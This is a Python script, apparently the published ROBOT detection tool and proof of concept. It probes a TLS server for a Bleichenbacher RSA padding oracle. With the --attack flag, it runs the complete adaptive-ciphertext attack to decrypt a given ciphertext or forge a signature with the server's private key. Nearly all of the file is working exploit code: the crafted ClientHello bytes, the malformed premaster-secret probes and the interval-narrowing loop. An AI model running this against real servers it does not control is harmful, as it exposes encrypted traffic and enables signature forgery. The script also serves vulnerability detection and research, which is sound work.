#!/usr/bin/env python3

# Detection and proof of concept for the ROBOT attack
# https://robotattack.org/
#
# This code is licensed as CC0.

# standard modules
import math
import time
import sys
import socket
import os
import argparse
import ssl

import gmpy2
from cryptography import x509
from cryptography.hazmat.backends import default_backend

# This uses all TLS_RSA ciphers with AES and 3DES
ch_def = bytearray.fromhex("16030100610100005d03034f20d66cba6399e552fd735d75feb0eeae2ea2ebb357c9004e21d0c2574f837a000010009d003d0035009c003c002f000a00ff01000024000d0020001e060106020603050105020503040104020403030103020303020102020203")

# This uses only TLS_RSA_WITH_AES_128_CBC_SHA (0x002f)
ch_cbc = bytearray.fromhex("1603010055010000510303ecce5dab6f55e5ecf9cccd985583e94df5ed652a07b1f5c7d9ba7310770adbcb000004002f00ff01000024000d0020001e060106020603050105020503040104020403030103020303020102020203")

# This uses only TLS-RSA-WITH-AES-128-GCM-SHA256 (0x009c)
ch_gcm = bytearray.fromhex("1603010055010000510303ecce5dab6f55e5ecf9cccd985583e94df5ed652a07b1f5c7d9ba7310770adbcb000004009c00ff01000024000d0020001e060106020603050105020503040104020403030103020303020102020203")

# Record payloads sent after the ClientKeyExchange (see oracle()): the
# ChangeCipherSpec body and a fixed blob sent as a handshake record.
ccs = bytearray.fromhex("000101")
enc = bytearray.fromhex("005091a3b6aaa2b64d126e5583b04c113259c4efa48e40a19b8e5f2542c3b1d30f8d80b7582b72f08b21dfcbff09d4b281676a0fb40d48c20c4f388617ff5c00808a96fbfe9bb6cc631101a6ba6b6bc696f0")

MSG_FASTOPEN = 0x20000000
# set to true if you want to generate a signature or if the first ciphertext
# is not PKCS#1 v1.5 conforming
EXECUTE_BLINDING = True


def get_rsa_from_server(server, port):
    """Fetch the RSA public key of the certificate presented by a TLS server.

    Connects with a cipher list restricted to "RSA", with certificate and
    hostname verification disabled, and reads the peer certificate.

    Reads the module-level ``timeout``, ``args`` and ``ip``.

    Returns:
        A tuple ``(n, e)`` with the public numbers of the certificate's key.

    On an SSL error, a refused connection or a timeout, this prints a
    diagnostic (and a CSV line when ``args.csv`` is set) and terminates the
    program via ``quit()``.
    """
    raw_socket = None
    s = None
    try:
        ctx = ssl.create_default_context()
        ctx.check_hostname = False
        ctx.verify_mode = ssl.CERT_NONE
        ctx.set_ciphers("RSA")
        raw_socket = socket.socket()
        raw_socket.settimeout(timeout)
        s = ctx.wrap_socket(raw_socket)
        s.connect((server, port))
        cert_raw = s.getpeercert(binary_form=True)
        cert_dec = x509.load_der_x509_certificate(cert_raw, default_backend())
        public_numbers = cert_dec.public_key().public_numbers()
        return public_numbers.n, public_numbers.e
    except ssl.SSLError as e:
        if not args.quiet:
            print("Cannot connect to server: %s" % e)
            print("Server does not seem to allow connections with TLS_RSA (this is ideal).")
        if args.csv:
            # TODO: We could add an extra check that the server speaks TLS without RSA
            print("NORSA,%s,%s,,,,,,,," % (args.host, ip))
        quit()
    except (ConnectionRefusedError, socket.timeout) as e:
        if not args.quiet:
            print("Cannot connect to server: %s" % e)
            print("There seems to be no TLS on this host/port.")
        if args.csv:
            print("NOTLS,%s,%s,,,,,,,," % (args.host, ip))
        quit()
    finally:
        # Runs on success, on quit() (SystemExit) and on unexpected errors.
        # Either socket may still be unset if the failure happened early;
        # closing an already closed socket is harmless.
        for sock in (s, raw_socket):
            if sock is not None:
                sock.close()


def _recv_or_fail(sock):
    """Receive up to 4096 bytes, raising if the peer closed the connection.

    recv() returns an empty result at end-of-stream; without this check the
    read loops in oracle() would never make progress and spin forever.
    """
    chunk = sock.recv(4096)
    if not chunk:
        raise ConnectionError("Connection closed by server during handshake")
    return chunk


def oracle(pms, messageflow=False):
    """Send one ClientKeyExchange carrying ``pms`` and describe the reply.

    Sends the selected ClientHello (module-level ``ch``), reads records until
    a ServerHelloDone is seen, then sends ``pms`` as the ClientKeyExchange
    payload. Unless ``messageflow`` is true, a ChangeCipherSpec and the fixed
    ``enc`` record are sent as well (the "standard" flow); with
    ``messageflow=True`` they are omitted (the "shortened" flow).

    Reads the module-level ``ip``, ``args``, ``ch``, ``timeout``,
    ``enable_fastopen`` and ``cke_2nd_prefix``; sets the module-level
    ``cke_version`` to the two version bytes taken from the server's reply.

    Returns:
        A string describing what the server did (alert number and length,
        timeout, reset, ...). Any exception is reported as ``str(exception)``.
        Callers only compare these strings for equality.
    """
    global cke_version
    s = None
    try:
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1)
        if not enable_fastopen:
            s.connect((ip, args.port))
            s.sendall(ch)
        else:
            s.sendto(ch, MSG_FASTOPEN, (ip, args.port))
        s.settimeout(timeout)
        buf = bytearray.fromhex("")
        i = 0
        bend = 0
        while True:
            # make sure the 5-byte record header at offset i is available
            while i + 5 > bend:
                buf += _recv_or_fail(s)
                bend = len(buf)
            # this is the record size
            psize = buf[i + 3] * 256 + buf[i + 4]
            # if the size is 2, we received an alert
            if (psize == 2):
                s.close()
                return ("The server sends an Alert after ClientHello")
            # try to read further record data
            while i + psize + 5 > bend:
                buf += _recv_or_fail(s)
                bend = len(buf)
            # check whether we have already received a ServerHelloDone
            # (handshake type 0x0e), either as this record's first message
            # or as the last 4 bytes received
            if (buf[i + 5] == 0x0e) or (buf[bend - 4] == 0x0e):
                break
            i += psize + 5
        cke_version = buf[9:11]
        s.send(bytearray(b'\x16') + cke_version)
        s.send(cke_2nd_prefix)
        s.send(pms)
        if not messageflow:
            s.send(bytearray(b'\x14') + cke_version + ccs)
            s.send(bytearray(b'\x16') + cke_version + enc)
        try:
            alert = s.recv(4096)
            s.close()
            if len(alert) == 0:
                return ("No data received from server")
            if alert[0] == 0x15:
                if len(alert) < 7:
                    return ("TLS alert was truncated (%s)" % (repr(alert)))
                return ("TLS alert %i of length %i" % (alert[6], len(alert)))
            else:
                return "Received something other than an alert (%s)" % (alert[0:10])
        except ConnectionResetError as e:
            s.close()
            return "ConnectionResetError"
        except socket.timeout:
            s.close()
            return ("Timeout waiting for alert")
    except Exception as e:
        # Deliberately broad: any failure is itself an oracle observation and
        # is reported as its message text.
        if s is not None:
            s.close()
        return str(e)


def BleichenbacherOracle(cc):
    """Return True if the server treats ciphertext ``cc`` like the good probe.

    ``cc`` is an integer ciphertext. It is encoded big-endian, zero-padded to
    the modulus length in bytes, and sent through oracle() using the
    module-level ``flow``. A match with ``oracle_good`` is queried a second
    time and only counted when both answers agree.

    Updates the module-level counters ``count`` (every call) and
    ``countvalid`` (confirmed matches).
    """
    global count
    global countvalid
    count = count + 1
    if count % 1000 == 0:
        print(count, "oracle queries")
    # Pad to whole bytes: padding to modulus_bits // 4 hex digits yields an
    # odd-length string (rejected by fromhex) whenever the modulus bit length
    # is not a multiple of 4.
    tmp = "{0:0{1}x}".format(cc, modulus_bytes * 2)
    pms = bytearray.fromhex(tmp)
    o = oracle(pms, messageflow=flow)
    if o == oracle_good:
        # Query the oracle again to make sure it is real...
        o = oracle(pms, messageflow=flow)
        if o == oracle_good:
            countvalid += 1
            return True
        else:
            print("Inconsistent result from oracle.")
            return False
    else:
        return False


parser = argparse.ArgumentParser(description="Bleichenbacher attack")
parser.add_argument("host", help="Target host")
group = parser.add_mutually_exclusive_group()
group.add_argument("-r", "--raw", help="Message to sign or decrypt (raw hex bytes)")
group.add_argument("-m", "--message", help="Message to sign (text)")
parser.add_argument("s0", nargs="?", default="1", help="Start for s0 value (default 1)")
parser.add_argument("limit", nargs="?", default="-1", help="Start for limit value (default -1)")
parser.add_argument("-a", "--attack", help="Try to attack if vulnerable", action="store_true")
parser.add_argument("-p", "--port", metavar='int', default=443, help="TCP port")
parser.add_argument("-t", "--timeout", default=5, help="Timeout")
parser.add_argument("-q", "--quiet", help="Quiet", action="store_true")
groupcipher = parser.add_mutually_exclusive_group()
groupcipher.add_argument("--gcm", help="Use only GCM/AES256.", action="store_true")
groupcipher.add_argument("--cbc", help="Use only CBC/AES128.", action="store_true")
parser.add_argument("--csv", help="Output CSV format", action="store_true")
args = parser.parse_args()

args.port = int(args.port)
timeout = float(args.timeout)

# Select the ClientHello matching the requested cipher restriction
if args.gcm:
    ch = ch_gcm
elif args.cbc:
    ch = ch_cbc
else:
    ch = ch_def

# We only enable TCP fast open if the Linux proc interface exists
enable_fastopen = os.path.exists("/proc/sys/net/ipv4/tcp_fastopen")

try:
    ip = socket.gethostbyname(args.host)
except socket.gaierror as e:
    if not args.quiet:
        print("Cannot resolve host: %s" % e)
    if args.csv:
        print("NODNS,%s,,,,,,,,," % (args.host))
    quit()

if not args.quiet:
    print("Scanning host %s ip %s port %i" % (args.host, ip, args.port))

N, e = get_rsa_from_server(ip, args.port)
# bit_length() is exact; a floating point log2 can be off by one for large N
modulus_bits = N.bit_length()
modulus_bytes = (modulus_bits + 7) // 8
if not args.quiet:
    print("RSA N: %s" % hex(N))
    print("RSA e: %s" % hex(e))
    print("Modulus size: %i bits, %i bytes" % (modulus_bits, modulus_bytes))

# Length fields preceding the encrypted premaster secret: 2-byte record
# length, handshake type 0x10, 3-byte handshake length, 2-byte ciphertext
# length.
cke_2nd_prefix = bytearray.fromhex("{0:0{1}x}".format(modulus_bytes + 6, 4) + "10" + "{0:0{1}x}".format(modulus_bytes + 2, 6) + "{0:0{1}x}".format(modulus_bytes, 4))
# pad_len is length in hex chars, so bytelen * 2
pad_len = (modulus_bytes - 48 - 3) * 2
rnd_pad = ("abcd" * (pad_len // 2 + 1))[:pad_len]

rnd_pms = "aa112233445566778899112233445566778899112233445566778899112233445566778899112233445566778899"
pms_good_in = int("0002" + rnd_pad + "00" + "0303" + rnd_pms, 16)
# wrong first two bytes
pms_bad_in1 = int("4117" + rnd_pad + "00" + "0303" + rnd_pms, 16)
# 0x00 on a wrong position, also trigger older JSSE bug
pms_bad_in2 = int("0002" + rnd_pad + "11" + rnd_pms + "0011", 16)
# no 0x00 in the middle
pms_bad_in3 = int("0002" + rnd_pad + "11" + "1111" + rnd_pms, 16)
# wrong version number (according to Klima / Pokorny / Rosa paper)
pms_bad_in4 = int("0002" + rnd_pad + "00" + "0202" + rnd_pms, 16)

# Encrypt each probe with the server's public key (textbook RSA)
pms_good = int(gmpy2.powmod(pms_good_in, e, N)).to_bytes(modulus_bytes, byteorder="big")
pms_bad1 = int(gmpy2.powmod(pms_bad_in1, e, N)).to_bytes(modulus_bytes, byteorder="big")
pms_bad2 = int(gmpy2.powmod(pms_bad_in2, e, N)).to_bytes(modulus_bytes, byteorder="big")
pms_bad3 = int(gmpy2.powmod(pms_bad_in3, e, N)).to_bytes(modulus_bytes, byteorder="big")
pms_bad4 = int(gmpy2.powmod(pms_bad_in4, e, N)).to_bytes(modulus_bytes, byteorder="big")

oracle_good = oracle(pms_good, messageflow=False)
oracle_bad1 = oracle(pms_bad1, messageflow=False)
oracle_bad2 = oracle(pms_bad2, messageflow=False)
oracle_bad3 = oracle(pms_bad3, messageflow=False)
oracle_bad4 = oracle(pms_bad4, messageflow=False)

if (oracle_good == oracle_bad1 == oracle_bad2 == oracle_bad3 == oracle_bad4):
    if not args.quiet:
        print("Identical results (%s), retrying with changed messageflow" % oracle_good)
    oracle_good = oracle(pms_good, messageflow=True)
    oracle_bad1 = oracle(pms_bad1, messageflow=True)
    oracle_bad2 = oracle(pms_bad2, messageflow=True)
    oracle_bad3 = oracle(pms_bad3, messageflow=True)
    oracle_bad4 = oracle(pms_bad4, messageflow=True)
    if (oracle_good == oracle_bad1 == oracle_bad2 == oracle_bad3 == oracle_bad4):
        if not args.quiet:
            print("Identical results (%s), no working oracle found" % oracle_good)
            print("NOT VULNERABLE!")
        if args.csv:
            print("SAFE,%s,%s,,,,%s,%s,%s,%s,%s" % (args.host, ip, oracle_good, oracle_bad1, oracle_bad2, oracle_bad3, oracle_bad4))
        sys.exit(1)
    else:
        flow = True
else:
    flow = False

# Re-checking all oracles to avoid unreliable results
oracle_good_verify = oracle(pms_good, messageflow=flow)
oracle_bad_verify1 = oracle(pms_bad1, messageflow=flow)
oracle_bad_verify2 = oracle(pms_bad2, messageflow=flow)
oracle_bad_verify3 = oracle(pms_bad3, messageflow=flow)
oracle_bad_verify4 = oracle(pms_bad4, messageflow=flow)

if (oracle_good != oracle_good_verify) or (oracle_bad1 != oracle_bad_verify1) or (oracle_bad2 != oracle_bad_verify2) or (oracle_bad3 != oracle_bad_verify3) or (oracle_bad4 != oracle_bad_verify4):
    if not args.quiet:
        print("Getting inconsistent results, aborting.")
    if args.csv:
        print("INCONSISTENT,%s,%s,,,,%s,%s,%s,%s,%s" % (args.host, ip, oracle_good, oracle_bad1, oracle_bad2, oracle_bad3, oracle_bad4))
    quit()

# If the response to the invalid PKCS#1 request (oracle_bad1) is equal to both
# requests starting with 0002, we have a weak oracle. This is because the only
# case where we can distinguish valid from invalid requests is when we send
# correctly formatted PKCS#1 message with 0x00 on a correct position. This
# makes our oracle weak
if (oracle_bad1 == oracle_bad2 == oracle_bad3):
    oracle_strength = "weak"
    if not args.quiet:
        print("The oracle is weak, the attack would take too long")
else:
    oracle_strength = "strong"
    if not args.quiet:
        print("The oracle is strong, real attack is possible")

if flow:
    flowt = "shortened"
else:
    flowt = "standard"

# cke_version holds the two version bytes oracle() took from the server reply
if cke_version[0] == 3 and cke_version[1] == 0:
    tlsver = "SSLv3"
elif cke_version[0] == 3 and cke_version[1] == 1:
    tlsver = "TLSv1.0"
elif cke_version[0] == 3 and cke_version[1] == 2:
    tlsver = "TLSv1.1"
elif cke_version[0] == 3 and cke_version[1] == 3:
    tlsver = "TLSv1.2"
else:
    tlsver = "TLS raw version %i/%i" % (cke_version[0], cke_version[1])

if args.csv:
    print("VULNERABLE,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s" % (args.host, ip, tlsver, oracle_strength, flowt, oracle_good, oracle_bad1, oracle_bad2, oracle_bad3, oracle_bad4))
else:
    print("VULNERABLE! Oracle (%s) found on %s/%s, %s, %s message flow: %s/%s (%s / %s / %s)" % (oracle_strength, args.host, ip, tlsver, flowt, oracle_good, oracle_bad1, oracle_bad2, oracle_bad3, oracle_bad4))

if not args.quiet:
    print("Result of good request: %s" % oracle_good)
    print("Result of bad request 1 (wrong first bytes): %s" % oracle_bad1)
    print("Result of bad request 2 (wrong 0x00 position): %s" % oracle_bad2)
    print("Result of bad request 3 (missing 0x00): %s" % oracle_bad3)
    print("Result of bad request 4 (bad TLS version): %s" % oracle_bad4)

# Only continue if we want to attack
if not args.attack:
    sys.exit(0)

# B marks the 0x0001 prefix position; PKCS#1 v1.5 conforming plaintexts
# (prefix 0x0002) lie in [2B, 3B - 1]
B = int("0001" + "00" * (modulus_bytes - 2), 16)
if args.raw:
    C = int(args.raw, 16)
else:
    if not args.message:
        msg = "This message was signed with a Bleichenbacher oracle."
        print('No message given, will sign "This message was signed with a Bleichenbacher oracle."')
    else:
        msg = args.message
    C = int("0001" + "ff" * (modulus_bytes - len(msg) - 3) + "00" + "".join("{:02x}".format(ord(c)) for c in msg), 16)

################################################################################
# define Bleichenbacher Oracle

count = 0
countvalid = 0

print("Using the following ciphertext: ", hex(C))

starttime = time.time()

a = int(2 * B)
b = int(3 * B - 1)

s0 = int(args.s0)
limit = int(args.limit)
c0 = C

# Step 1: Blinding
print("Searching for the first valid ciphertext starting %i" % s0)
if (EXECUTE_BLINDING):
    while not BleichenbacherOracle(c0):
        s0 = s0 + 1
        c0 = (int(gmpy2.powmod(s0, e, N)) * C) % N
        if (limit != -1) and s0 > limit:
            quit()

print(" -> Found s0: ", s0)

# M is the current set of candidate intervals (a, b) for the plaintext
M = set()
M.add((a, b))
Mnew = set()
Mnext = set()
previntervalsize = 0
i = 1
while True:
    # find pairs r,s such that m*s % N = m*s-r*N is PKCS conforming
    # 2.a)
    if i == 1:
        s = N // (3 * B)
        cc = (int(gmpy2.powmod(s, e, N)) * c0) % N
        while not BleichenbacherOracle(cc):
            s += 1
            cc = (int(gmpy2.powmod(s, e, N)) * c0) % N

    # 2.b)
    if not i == 1 and len(M) >= 2:
        s += 1
        cc = (int(gmpy2.powmod(s, e, N)) * c0) % N
        while not BleichenbacherOracle(cc):
            s += 1
            cc = (int(gmpy2.powmod(s, e, N)) * c0) % N

    # 2.c)
    if not i == 1 and len(M) == 1:
        a, b = M.pop()
        M.add((a, b))
        r = 2 * (b * s - 2 * B) // N
        # ceil((2B + rN) / b), written as negated floor division; the
        # parenthesis must close before "// b", as in the loop below
        s = -(-(2 * B + r * N) // b)
        cc = (int(gmpy2.powmod(s, e, N)) * c0) % N
        while not BleichenbacherOracle(cc):
            s += 1
            if s > ((3 * B + r * N) // a):
                r += 1
                s = -(-(2 * B + r * N) // b)
            cc = (int(gmpy2.powmod(s, e, N)) * c0) % N

    # compute all possible r, depending on the known bounds on m.
    # Use that 2*B+r*N <= ms <= 3*B-1+r*N
    # is equivalent to (a*s-3*B-1)/N <= r <= (b*s-2*B)/N
    # 3.
    for MM in M:
        a, b = MM
        rmax = (b * s - 2 * B) // N
        rmin = -(-(a * s - 3 * B - 1) // N)
        # for all possible pairs (s,r) we obtain bounds
        # (2*B+r*N)/s) <= m <= (3*B+1+r*N)/s) on m.
        # Add bounds only if they make sense, i.e., if a < b.
        for r in range(rmin, rmax + 1):
            anew = (2 * B + r * N) // s
            bnew = -(-(3 * B + 1 + r * N) // s)
            if anew < bnew:
                Mnew.add((anew, bnew))

    # Keep only intervals which are compatible with previous intervals
    Mnext.clear()
    for MMnew in Mnew:
        anew, bnew = MMnew
        for MM in M:
            a, b = MM
            if (bnew <= b and bnew >= a) or (anew >= a and anew <= b) or (anew >= a and bnew <= b and anew <= bnew) or (anew <= a and bnew >= b):
                Mnext.add((max([a, anew]), min([b, bnew])))

    M.clear()
    Mnew.clear()
    M |= Mnext

    if len(M) == 1:
        a, b = M.pop()
        M.add((a, b))
        # log() is undefined for 0; an interval that collapsed to a single
        # point is reported as size 0
        intervalsize = int(math.ceil(math.log(b - a, 2))) if b > a else 0
        if not intervalsize == previntervalsize:
            previntervalsize = intervalsize
            print(count, "oracle queries, Interval size:", intervalsize, "bit.")
        if intervalsize < 10:
            break

    i += 1

# A bare "print" is a no-op expression in Python 3; call it to emit the
# intended blank line
print()
print("Starting exhaustive search on remaining interval")
print("min: ", hex(a))
print("max: ", hex(b))
while not c0 == int(gmpy2.powmod(a, e, N)):
    a += 1
print("C: ", hex(C))
print("result: ", hex(a))
if s0 != 1:
    # undo the blinding from step 1: multiply by s0^-1 mod N
    x = int(gmpy2.invert(s0, N))
    res = (x * a) % N
    print("result after unblinding: ", hex(res))

stoptime = time.time()
print("Time elapsed:", stoptime - starttime, "seconds (=", (stoptime - starttime) / 60, "minutes)")
print("Modulus size:", modulus_bits, "bit. About", (stoptime - starttime) / modulus_bits, "seconds per bit.")
print(count, "oracle queries performed,", countvalid, "valid ciphertexts.")